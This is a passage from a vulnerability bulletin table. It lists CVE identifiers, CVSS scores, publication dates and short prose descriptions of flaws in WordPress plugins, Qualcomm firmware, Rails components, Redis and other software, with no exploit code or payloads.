The AI Scribe - SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the engine_request_data() function in all versions up to, and including, 2.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin settings. | 2025-01-10 | 4.3 | CVE-2024-12606 |
| OpenHarmony--OpenHarmony |
in OpenHarmony v4.1.2 and prior versions allow a local attacker cause information leak through out-of-bounds Read. | 2025-01-07 | 5.5 | CVE-2024-45070 |
| OpenHarmony--OpenHarmony |
in OpenHarmony v4.1.2 and prior versions allow a local attacker cause DOSÂ through use after free. | 2025-01-07 | 4.4 | CVE-2024-54030 |
| ORION--Allada T-shirt Designer for Woocommerce |
Missing Authorization vulnerability in ORION Allada T-shirt Designer for Woocommerce.This issue affects Allada T-shirt Designer for Woocommerce: from n/a through 1.1. | 2025-01-07 | 5.3 | CVE-2025-22363 |
| osamaesh--WP Visitor Statistics (Real Time Traffic) |
Missing Authorization vulnerability in osamaesh WP Visitor Statistics (Real Time Traffic) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Visitor Statistics (Real Time Traffic): from n/a through 7.3. | 2025-01-07 | 4.3 | CVE-2025-22304 |
| otwthemes--Toggles Shortcode and Widget |
The Toggles Shortcode and Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'content' parameter in all versions up to, and including, 1.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-01-07 | 4.4 | CVE-2024-12207 |
| outtheboxthemes--Same but Different Related Posts by Taxonomy |
The Same but Different - Related Posts by Taxonomy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-11363 |
| Pablo Cornehl--WP Github |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pablo Cornehl WP Github allows Stored XSS.This issue affects WP Github: from n/a through 1.3.3. | 2025-01-07 | 6.5 | CVE-2025-22549 |
| pantherius--WordPress Survey & Poll Quiz, Survey and Poll Plugin for WordPress |
The WordPress Survey & Poll - Quiz, Survey and Poll Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpsurveypoll_results' shortcode in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12528 |
| Paul Bearne--Author Avatars List/Block |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paul Bearne Author Avatars List/Block allows Stored XSS.This issue affects Author Avatars List/Block: from n/a through 2.1.23. | 2025-01-09 | 6.5 | CVE-2025-22804 |
| paygreen--PayGreen Payment Gateway |
The PayGreen Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message_id' parameter in all versions up to, and including, 1.0.26 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-11810 |
| phoeniixx--Woocommerce check pincode/zipcode for shipping |
The Woocommerce check pincode/zipcode for shipping plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.4. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-09 | 6.1 | CVE-2024-12218 |
| Piotnet--Piotnet Addons For Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Piotnet Piotnet Addons For Elementor allows Stored XSS.This issue affects Piotnet Addons For Elementor: from n/a through 2.4.31. | 2025-01-07 | 6.5 | CVE-2025-22333 |
| piotnetdotcom--Piotnet Addons For Elementor |
The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Heading widget in all versions up to, and including, 2.4.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-08 | 6.4 | CVE-2024-9673 |
| Pixelite--WP FullCalendar |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pixelite WP FullCalendar allows Stored XSS.This issue affects WP FullCalendar: from n/a through 1.5. | 2025-01-07 | 6.5 | CVE-2025-22261 |
| PixelYourSite--PixelYourSite Your smart PIXEL (TAG) Manager |
Cross-Site Request Forgery (CSRF) vulnerability in PixelYourSite PixelYourSite - Your smart PIXEL (TAG) Manager allows Cross Site Request Forgery.This issue affects PixelYourSite - Your smart PIXEL (TAG) Manager: from n/a through 10.0.1.2. | 2025-01-07 | 5.4 | CVE-2025-22300 |
| PLANEX COMMUNICATIONS INC.--MZK-DP300N |
Cross-site scripting vulnerability exists in MZK-DP300N firmware versions 1.05 and earlier. If an attacker logs in to the affected product and manipulates the device settings, an arbitrary script may be executed on the logged-in user's web browser when accessing a crafted URL. | 2025-01-08 | 4.8 | CVE-2025-21603 |
| pluginspoint--Timeline Pro |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pluginspoint Timeline Pro allows DOM-Based XSS.This issue affects Timeline Pro: from n/a through 1.3. | 2025-01-07 | 6.5 | CVE-2025-22584 |
| POSIMYTH--Nexter Blocks |
Missing Authorization vulnerability in POSIMYTH Nexter Blocks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Nexter Blocks: from n/a through 4.0.7. | 2025-01-07 | 6.4 | CVE-2024-56294 |
| posturinn--Psturinn\'s Shipping with WooCommerce |
The Pósturinn\'s Shipping with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the printed_marked and nonprinted_marked parameters in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-09 | 6.1 | CVE-2024-11815 |
| Powerfusion--WPAchievements Free |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Powerfusion WPAchievements Free allows Stored XSS.This issue affects WPAchievements Free: from n/a through 1.2.0. | 2025-01-07 | 6.5 | CVE-2025-22362 |
| Progress--Sitefinity |
: Insufficient Session Expiration vulnerability in Progress Sitefinity allows : Session Fixation.This issue affects Sitefinity: from 4.0 through 14.4.8142, from 15.0.8200 through 15.0.8229, from 15.1.8300 through 15.1.8327, from 15.2.8400 through 15.2.8421. | 2025-01-07 | 6.8 | CVE-2024-11627 |
| proloybhaduri--LazyLoad Background Images |
The LazyLoad Background Images plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pblzbg_save_settings() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. | 2025-01-07 | 4.3 | CVE-2024-12327 |
| qualcomm -- ar8035_firmware |
Information disclosure while invoking callback function of sound model driver from ADSP for every valid opcode received from sound model driver. | 2025-01-06 | 6.1 | CVE-2024-33067 |
| qualcomm -- fastconnect_6900_firmware |
Memory corruption when input parameter validation for number of fences is missing for fence frame IOCTL calls, | 2025-01-06 | 6.7 | CVE-2024-33041 |
| qualcomm -- fastconnect_6900_firmware |
Memory corruption while invoking IOCTL calls to unmap the DMA buffers. | 2025-01-06 | 6.7 | CVE-2024-33055 |
| qualcomm -- fastconnect_6900_firmware |
Memory corruption while processing frame command IOCTL calls. | 2025-01-06 | 6.7 | CVE-2024-33059 |
| qualcomm -- qam8255p_firmware |
Information Disclosure while invoking the mailbox write API when message received from user is larger than mailbox size. | 2025-01-06 | 6.6 | CVE-2024-23366 |
| qualcomm -- qam8255p_firmware |
information disclosure while invoking the mailbox read API. | 2025-01-06 | 6.1 | CVE-2024-43063 |
| qualcomm -- qcs8550_firmware |
Information disclosure while processing IOCTL call made for releasing a trusted VM process release or opening a channel without initializing the process. | 2025-01-06 | 6.8 | CVE-2024-33061 |
| Qualcomm, Inc.--Snapdragon |
Transient DOS can occur when GVM sends a specific message type to the Vdev-FastRPC backend. | 2025-01-06 | 5.5 | CVE-2024-45559 |
| Rails--Action Pack |
The redirect_to method in Rails allows provided values to contain characters which are not legal in an HTTP header value. This results in the potential for downstream services which enforce RFC compliance on HTTP response headers to remove the assigned Location header. | 2025-01-09 | 4 | CVE-2023-28362 |
| Rails--ActiveSupport |
There is a vulnerability in ActiveSupport if the new bytesplice method is called on a SafeBuffer with untrusted user input. | 2025-01-09 | 5.3 | CVE-2023-28120 |
| Rails--Kredis JSON |
There is a deserialization of untrusted data vulnerability in the Kredis JSON deserialization code | 2025-01-09 | 5.3 | CVE-2023-27531 |
| Rails--Rack |
There is a denial of service vulnerability in the header parsing component of Rack. | 2025-01-09 | 5.3 | CVE-2023-27539 |
| Rails--rails-ujs |
There is a potential DOM based cross-site scripting issue in rails-ujs which leverages the Clipboard API to target HTML elements that are assigned the contenteditable attribute. This has the potential to occur when pasting malicious HTML content from the clipboard that includes a data-method, data-remote or data-disable-with attribute. | 2025-01-09 | 6.3 | CVE-2023-23913 |
| rajeshsingh520--Store credit / Gift cards for woocommerce |
The Store credit / Gift cards for woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'coupon', 'start_date', and 'end_date' parameters in all versions up to, and including, 1.0.49.46 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-11369 |
| ramon-fincken--Simple add pages or posts |
The Simple add pages or posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.0. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12288 |
| reader87--Dominion Domain Checker for WPBakery |
The Dominion - Domain Checker for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dominion_shortcodes_domain_search_6' shortcode in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-12520 |
| realmag777--MDTF Meta Data and Taxonomies Filter |
The MDTF - Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to SQL Injection via the 'key' attribute of the 'mdf_value' shortcode in all versions up to, and including, 1.3.3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-08 | 6.5 | CVE-2024-12030 |
| Red Hat--Red Hat Enterprise Linux 6 |
A flaw was found in the OpenJPEG project. A heap buffer overflow condition may be triggered when certain options are specified while using the opj_decompress utility. This can lead to an application crash or other undefined behavior. | 2025-01-09 | 5.6 | CVE-2024-56826 |
| Red Hat--Red Hat Enterprise Linux 6 |
A flaw was found in the OpenJPEG project. A heap buffer overflow condition may be triggered when certain options are specified while using the opj_decompress utility. This can lead to an application crash or other undefined behavior. | 2025-01-09 | 5.6 | CVE-2024-56827 |
| redis--redis |
Redis is an open source, in-memory database that persists on disk. An authenticated with sufficient privileges may create a malformed ACL selector which, when accessed, triggers a server panic and subsequent denial of service. The problem is fixed in Redis 7.2.7 and 7.4.2. | 2025-01-06 | 4.4 | CVE-2024-51741 |
| reflectionmedia--User Profile Builder Beautiful User Registration Forms, User Profiles & User Role Editor |
The User Profile Builder - Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several user meta parameters in all versions up to, and including, 3.12.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and clicks a link to show user meta. | 2025-01-07 | 6.1 | CVE-2024-12738 |
| reichertbrothers--SimplyRETS Real Estate IDX |
The SimplyRETS Real Estate IDX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sr_search_form' shortcode in all versions up to, and including, 2.11.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-12491 |
| revmakx--InfiniteWP Client |
The InfiniteWP Client plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.13.0 via the 'historyID' parameter of the ~/debug-chart/index.php file. This makes it possible for unauthenticated attackers to read .txt files outside of the intended directory. | 2025-01-08 | 5.3 | CVE-2024-10585 |
| rightmessage--RightMessage WP |
The RightMessage WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rm_area' shortcode in all versions up to, and including, 0.9.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12445 |
| Robert Peake--Responsive Flickr Slideshow |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Robert Peake Responsive Flickr Slideshow allows Stored XSS.This issue affects Responsive Flickr Slideshow: from n/a through 2.6.0. | 2025-01-09 | 6.5 | CVE-2025-22807 |
| rrdevs--RRAddons for Elementor |
The RRAddons for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.0 via the Popup block due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts that they should not have access to. | 2025-01-11 | 4.3 | CVE-2024-11915 |
| S3Bubble--S3Player WooCommerce & Elementor Integration |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in S3Bubble S3Player - WooCommerce & Elementor Integration allows Stored XSS.This issue affects S3Player - WooCommerce & Elementor Integration: from n/a through 4.2.1. | 2025-01-09 | 6.5 | CVE-2025-22818 |
| samdani--GS Insever Portfolio |
The GS Insever Portfolio plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_settings() function in all versions up to, and including, 1.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's CSS settings. | 2025-01-09 | 4.3 | CVE-2024-12249 |
| Saoshyant.1994--Saoshyant Page Builder |
Missing Authorization vulnerability in Saoshyant.1994 Saoshyant Page Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Saoshyant Page Builder: from n/a through 3.8. | 2025-01-07 | 5.3 | CVE-2025-22560 |
| sazzadh--Image Magnify |
The Image Magnify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'image_magnify' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11445 |
| scriptsbundle--AdForest |
The AdForest theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions like 'sb_remove_ad' in all versions up to, and including, 5.1.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete posts, attachments and deactivate a license. | 2025-01-08 | 4.3 | CVE-2024-12855 |
| searchie--Searchie |
The Searchie plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sio_embed_media' shortcode in all versions up to, and including, 1.17.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-12819 |
| SecureSubmit--WP SecureSubmit |
Missing Authorization vulnerability in SecureSubmit WP SecureSubmit.This issue affects WP SecureSubmit: from n/a through 1.5.16. | 2025-01-07 | 5.3 | CVE-2024-56270 |
| SecureSubmit--WP SecureSubmit |
Missing Authorization vulnerability in SecureSubmit WP SecureSubmit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP SecureSubmit: from n/a through 1.5.16. | 2025-01-07 | 4.3 | CVE-2024-56271 |
| sellsy--Sellsy |
The Sellsy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'testSellsy' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12592 |
| seomantis--SEO Keywords |
The SEO Keywords plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'google_error' parameter in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12126 |
| shaonsina--Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) |
The Sina Extension for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sina Image Differ widget in all versions up to, and including, 3.5.91 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12624 |
| silabs.com--Simplicity SDK |
A malformed 802.15.4 packet causes a buffer overflow to occur leading to an assert and a denial of service. A watchdog reset clears the error condition automatically. | 2025-01-08 | 6.5 | CVE-2024-6350 |
| Simon Chuang--Show Google Analytics widget |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Simon Chuang Show Google Analytics widget allows Stored XSS.This issue affects Show Google Analytics widget: from n/a through 1.5.4. | 2025-01-07 | 6.5 | CVE-2025-22515 |
| SingMR--HouseRent |
A vulnerability was found in SingMR HouseRent 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file src/main/java/com/house/wym/controller/AdminController.java. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2024-13211 |
| SingMR--HouseRent |
A vulnerability classified as critical has been found in SingMR HouseRent 1.0. This affects the function singleUpload/upload of the file src/main/java/com/house/wym/controller/AddHouseController.java. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2024-13212 |
| SIOT-- |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SIOT ì•„ìž„í¬íŠ¸ ê²°ì œë²„íŠ¼ ìƒì„± í”ŒëŸ¬ê·¸ì¸ allows Stored XSS.This issue affects ì•„ìž„í¬íŠ¸ ê²°ì œë²„íŠ¼ ìƒì„± 플러그ì¸: from n/a through 1.1.19. | 2025-01-07 | 6.5 | CVE-2025-22530 |
| skyword--Skyword API Plugin |
The Skyword API Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'skyword_iframe' shortcode in all versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-11907 |
| smartdatasoft--Essential WP Real Estate |
The Essential WP Real Estate plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the cl_delete_listing_func() function in all versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to delete arbitrary pages and posts. | 2025-01-10 | 5.3 | CVE-2024-13318 |
| socialrocket--Social Rocket Social Sharing Plugin |
The Social Rocket - Social Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialrocket-floating' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-9702 |
| socialrocket--Social Rocket Social Sharing Plugin |
The Social Rocket - Social Sharing Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tweet_settings_save() and tweet_settings_update() functions in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. | 2025-01-07 | 5.3 | CVE-2024-9697 |
| solwininfotech--Timeline Designer |
The Timeline Designer plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in all versions up to, and including, 1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-07 | 4.9 | CVE-2024-11437 |
| SourceCodester--Home Clean Services Management System |
A vulnerability has been found in SourceCodester Home Clean Services Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /public_html/admin/process.php. The manipulation of the argument type/length/business leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2025-01-07 | 4.7 | CVE-2025-0294 |
| spacecodes--AI for SEO |
Missing Authorization vulnerability in spacecodes AI for SEO allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI for SEO: from n/a through 1.2.9. | 2025-01-07 | 4.3 | CVE-2025-22299 |
| sperse--Automate Hub Free by Sperse.IO |
The Automate Hub Free by Sperse.IO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-11377 |
| Splunk--Splunk App for SOAR |
In versions 1.0.67 and lower of the Splunk App for SOAR, the Splunk documentation for that app recommended adding the `admin_all_objects` capability to the `splunk_app_soar` role. This addition could lead to improper access control for a low-privileged user that does not hold the "admin" Splunk roles. | 2025-01-07 | 6.4 | CVE-2025-22621 |
| Sprout Apps--Help Scout |
Missing Authorization vulnerability in Sprout Apps Help Scout allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Help Scout: from n/a through 6.5.1. | 2025-01-07 | 4.3 | CVE-2025-22512 |
| ssema--SEMA API |
The SEMA API plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'catid' parameter in all versions up to, and including, 5.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-09 | 6.1 | CVE-2024-12285 |
| StarSea99--starsea-mall |
A vulnerability was found in StarSea99 starsea-mall 1.0. It has been declared as critical. This vulnerability affects the function UploadController of the file src/main/java/com/siro/mall/controller/common/uploadController.java. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-12 | 4.7 | CVE-2025-0399 |
| Steve D--SpeakOut! Email Petitions |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Steve D SpeakOut! Email Petitions allows DOM-Based XSS.This issue affects SpeakOut! Email Petitions: from n/a through 4.4.2. | 2025-01-07 | 6.5 | CVE-2025-22309 |
| Stormhill Media--MyBookTable Bookstore |
Cross-Site Request Forgery (CSRF) vulnerability in Stormhill Media MyBookTable Bookstore allows Cross Site Request Forgery.This issue affects MyBookTable Bookstore: from n/a through 3.5.3. | 2025-01-07 | 5.4 | CVE-2025-22301 |
| stylemix--WordPress Header Builder Plugin Pearl |
The WordPress Header Builder Plugin - Pearl plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.8. This is due to missing or incorrect nonce validation on the stm_header_builder page. This makes it possible for unauthenticated attackers to delete arbitrary headers via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-09 | 4.3 | CVE-2024-12206 |
| surakrai--MIMO Woocommerce Order Tracking |
The MIMO Woocommerce Order Tracking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add, update, and delete shipper tracking settings. | 2025-01-09 | 4.3 | CVE-2024-5769 |
| Surbma--Surbma | Premium WP |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Surbma Surbma | Premium WP allows DOM-Based XSS.This issue affects Surbma | Premium WP: from n/a through 9.0. | 2025-01-09 | 6.5 | CVE-2025-22808 |
| sw-galati.ro--iframe to embed |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sw-galati.ro iframe to embed allows Stored XSS.This issue affects iframe to embed: from n/a through 1.2. | 2025-01-07 | 6.5 | CVE-2025-22545 |
| swarminteractive--ViewMedica 9 |
The ViewMedica 9 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.15. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12291 |
| swarminteractive--ViewMedica 9 |
The ViewMedica 9 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.15. This is due to missing or incorrect nonce validation on the 'Viewmedica-Admin' page. This makes it possible for unauthenticated attackers to inject arbitrary SQL queries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-07 | 5.4 | CVE-2024-12170 |
| sweepwidget--SweepWidget Contests, Giveaways, Photo Contests, Competitions |
The SweepWidget Contests, Giveaways, Photo Contests, Competitions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sweepwidget' shortcode in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11756 |
| tcoder--TCBD Auto Refresher |
The TCBD Auto Refresher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbd_auto_refresh' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-12519 |
| TemplatesNext--TemplatesNext ToolKit |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TemplatesNext TemplatesNext ToolKit allows Stored XSS.This issue affects TemplatesNext ToolKit: from n/a through 3.2.9. | 2025-01-07 | 6.5 | CVE-2025-22310 |
| teonos--Slotti Ajanvaraus |
The Slotti Ajanvaraus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slotti-embed-ga' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-08 | 6.4 | CVE-2024-12521 |
| thehappymonster--Happy Addons for Elementor |
The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ha_cmc_text' parameter of the Happy Mouse Cursor in all versions up to, and including, 3.15.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-08 | 6.4 | CVE-2024-12852 |
| TheInnovs--ElementsCSS Addons for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TheInnovs ElementsCSS Addons for Elementor allows Stored XSS.This issue affects ElementsCSS Addons for Elementor: from n/a through 1.0.8.7. | 2025-01-07 | 6.5 | CVE-2025-22321 |
| themeatelier--Chat Support for Viber Chat Bubble and Chat Button for Gutenberg, Elementor and Shortcode |
The Chat Support for Viber - Chat Bubble and Chat Button for Gutenberg, Elementor and Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vchat' shortcode in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12457 |
| themebon--Ultimate Image Hover Effects |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themebon Ultimate Image Hover Effects allows DOM-Based XSS.This issue affects Ultimate Image Hover Effects: from n/a through 1.1.2. | 2025-01-07 | 6.5 | CVE-2025-22585 |
| themeisle--Orbit Fox by ThemeIsle |
The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tag' parameter in all versions up to, and including, 2.10.43 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-10 | 6.4 | CVE-2024-13183 |
| themeisle--Orbit Fox by ThemeIsle |
